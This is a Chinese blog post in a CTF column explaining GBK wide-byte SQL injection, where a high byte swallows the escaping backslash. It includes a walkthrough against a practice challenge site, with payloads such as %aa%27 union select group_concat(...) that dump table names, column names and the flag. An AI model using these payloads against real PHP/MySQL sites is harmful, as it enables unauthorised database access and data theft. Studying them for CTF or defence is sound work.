宽字节注入

最新推荐文章于 2024-07-26 13:34:44 发布
最新推荐文章于 2024-07-26 13:34:44 发布
阅读量1.2k 收藏 5
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/william_munch/article/details/100037244
版权

〇、预备知识 

首先列举几个常用的URL转码的字符

空格           %20

单引号       %27

#                %23

\                 %5C

一、原理

宽字节注入发生的位置就是PHP发送请求到MYSQL时字符集使用character_set_client设置值进行了一次编码。在使用PHP连接MySQL的时候,当设置“character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入

宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。

这里的宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围),而当我们输入有单引号时会自动加入\进行转义而变为\’(在PHP配置文件中magic_quotes_gpc=On的情况下或者使用addslashes函数,icov函数,mysql_real_escape_string函数、mysql_escape_string函数等,提交的参数中如果带有单引号’,就会被自动转义\’,使得多数注入攻击无效),由于宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,将后面的一个字节与前一个大于128的ascii码进行组合成为一个完整的字符(mysql判断一个字符是不是汉字,首先两个字符时一个汉字,另外根据gbk编码,第一个字节ascii码大于128,基本上就可以了),此时’前的\就被吃了,我们就可以使用’了,利用这个特性从而可实施SQL注入的利用。

最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图1所示,然后在十六进制前面加%即可,即为%81,任意进制在线转换网站请点击此处!另外可以直接记住GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),则尾字节会被吃点,如转义符号\对应的编码0×5C!另外简单提一下,GB2312是被GBK兼容的,它的高位范围是0xA1-0xF7,低位范围是0xA1-0xFE(0x5C不在该范围内),因此不能使用编码吃掉%5c。

二、实战

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

由下面三图猜测 第二行是查表得到的数据,差不到5对应的表。

于是开始注入

可以这样理解:把url里的id= 后边的内容当作字符串,放在 select id,title from news where id = ' '  的 ' '中,然后我们加的单引号被转义了,很明显这是没有注入成功的,这暗示可能涉及到宽字节注入

而当我们提交  id=1%aa' and 1=1%23    MySQL的运行的SQL语句为 select * from user where id ='1歿' and 1=1#'

MySQL的的特性,因为GBK是多字节编码,他认为两个字节代表一个汉字,所以%aa和后面的\也就是%5c中变成了一个汉字“歿”,而“逃逸了出来。最后我们加一个#(mysql的注释符,注释掉最后一个单引号)

这里我曾好奇为啥会查出id='1歿'的表?应该没有第二行显示才对,如果你有这样的疑惑看下图  ,原来是自动忽略了数值后的非数值,实际上还是查了id='1'的表。

第二行显示看起来是查到的第一条记录的某一个字段,那么就看看是哪个字段

可见是title字段,那么继续看是什么数据库

继续爆表

id=%aa%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sae-chinalover'%23

可以看到数据库外部的引号又被转义了,这样我们可以用数据库的全局变量来做

id=%aa%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

也可以用16进制,MySQL也会把他认为是字符串

下面是爆字段(以ctf4为例,flag在这个表里,但是实际中flag在哪个表 是需要试的)

id=%aa%27 union select 1,group_concat(column_name)from information_schema.columns where table_name='ctf4'%23


还是这问题。之前数据库名可以用database()这个全局变量来代替,但是对于表名并没有对应的全局变量,所以只能采用16进制的方法,MySQL就会把他认为是字符型格式

id=%aa' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

爆出了两列,下面再获取flag的内容

id=%aa%27 union select 1,group_concat(flag) from ctf4%23

晚安丶
关注
专栏目录
sqlmap跑宽字节注入(渗透测试之SQL注入之宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 902
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
mysql 南邮ctf_宽字节注入和防御(示例代码)
weixin_42282482的博客
02-07 323
0、前言最近要为了自动化审计搜集所有PHP漏洞,在整理注入的时候,发现宽字节注入中使用iconv造成的漏洞原理没有真正搞懂,网上的文章也说得不是很清楚,于是看了荣哥(lxsec)以前发的一篇http://www.91ri.org/8611.html,加上我们两个人的讨论,最终有了这一篇深入的研究成果。1、概述主要是由于使用了宽字节编码造成的。什么是字符集?计算机显示的字符图形与保存该字符时的二进制...
记一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
最新发布
qq_56035503的博客
07-26 751
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于宽字节的注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
【SQL注入】宽字节注入原理、利用
07-14 1860
【SQL-宽字节注入
如何运用宽字节实现Sql注入?
MSB_WLAQ的博客
10-08 314
什么是魔术引号 了解一个PHP的防御函数==》magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)等字符都会被加上反斜线 magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤.
sql注入宽字节注入
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 宽字节注入宽字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入宽字节字符来篡改SQL语句或绕过认证。 预防宽字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的宽字节注入漏洞。 总的来说,要防止SQL注入和宽字节注入等安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值